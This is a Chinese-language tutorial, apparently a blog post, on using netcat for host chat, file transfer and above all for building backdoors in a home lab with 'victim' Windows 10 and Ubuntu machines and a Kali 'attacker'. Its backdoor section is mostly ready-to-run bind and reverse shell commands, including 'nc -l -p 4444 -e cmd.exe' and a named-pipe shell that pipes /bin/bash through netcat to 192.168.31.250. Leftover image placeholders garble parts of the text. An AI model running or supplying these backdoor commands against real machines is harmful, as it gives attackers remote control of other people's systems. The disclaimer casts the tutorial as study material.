【瑞士軍刀】netcat使用方法
本文僅用作學習用途,切莫做違法的事情,産生一切後果與本人無關。
1、主機間通信
服務端開啟
nc -l -p 4444
-l listening
-p Port

nc IP Port
連接配接服務端
2、遠端shell
nc -l -p 4444 -e cmd.exe
-e 遠端連接配接shell(比較危險)
nc IP Port
3、檔案傳輸
nc -l -p 4444 > file.txt
作為服務端開啟監聽模式,将遠端傳來的檔案導入到本地file.txt檔案中。(>為覆寫,>>為追加)
nc IP Port < test.txt
将test.txt檔案内容傳輸到指定主機。
先建立一個test.txt檔案,寫入i love you。
将該檔案遠端傳輸到kali
到kali檢視結果:
檔案傳輸成功!
4、建立後門
後門的分類
監聽後門:受害者做服務端,攻擊者做用戶端,受害者等待攻擊者主動連接配接
連接配接後門:攻擊者做服務端,受害者做用戶端,受害者自動連接配接攻擊者
-
在window建立後門
實驗一:
在kali開啟服務端:後門類型 實驗環境 連接配接後門 受害者windows10: 192.168.31.212; 攻擊者kali:192.168.31.250 nc -l -p 4444
在win10去連接配接kali:
nc IP Port cmd.exe
kali直接擷取windows的shell:
實驗二:
後門類型 | 實驗環境 |
---|---|
監聽後門 | 受害主機win10: 192.168.31.212 ; 攻擊主機kali:192.168.31.250 |
在win10開啟服務端:
nc -l -p 4444 -e cmd.exe
在kali去連接配接win10:
nc 192.168.31.212 4444
如圖所示成功連接配接,成功建立後門!
-
在linux上建立後門
實驗一:
後門類型 實驗環境 監聽後門 受害主機ubuntu: 192.168.31.49 ; 攻擊者kali: 192.168.31.250 kali中的netcat是GNU版
ubuntu中的netcat是openbsd版,此版本
-e
指令被删除了,我們管道來代替完成。
先在ubuntu中建立後門,執行以下指令:
建立一個命名管道mkfifo /tmp/f
開啟服務端cat /tmp/f | /bin/bash 2>&1 | /bin/nc.openbsd -l -p 9090 > /tmp/f
在kail中連接配接:【瑞士軍刀】netcat使用方法【瑞士軍刀】netcat使用方法 nc 192.168.31.250 9090
嘗試運作shell指令:【瑞士軍刀】netcat使用方法【瑞士軍刀】netcat使用方法 【瑞士軍刀】netcat使用方法【瑞士軍刀】netcat使用方法 如圖所示,執行成功!
實驗二:
先在kali中開啟服務端:後門類型 實驗環境 連接配接後門 受害主機ubuntu: 192.168.31.49 ; 攻擊者kali: 192.168.31.250 nc -l -p 9090
在ubuntu中建立後門:【瑞士軍刀】netcat使用方法【瑞士軍刀】netcat使用方法 cat /tmp/f | /bin/bash 2>&1 | /bin/nc.openbsd 192.168.31.250 9090 > /tmp/f
回到kali中嘗試執行shell指令:【瑞士軍刀】netcat使用方法【瑞士軍刀】netcat使用方法 如圖所示,執行成功,說明後門建立成功!【瑞士軍刀】netcat使用方法【瑞士軍刀】netcat使用方法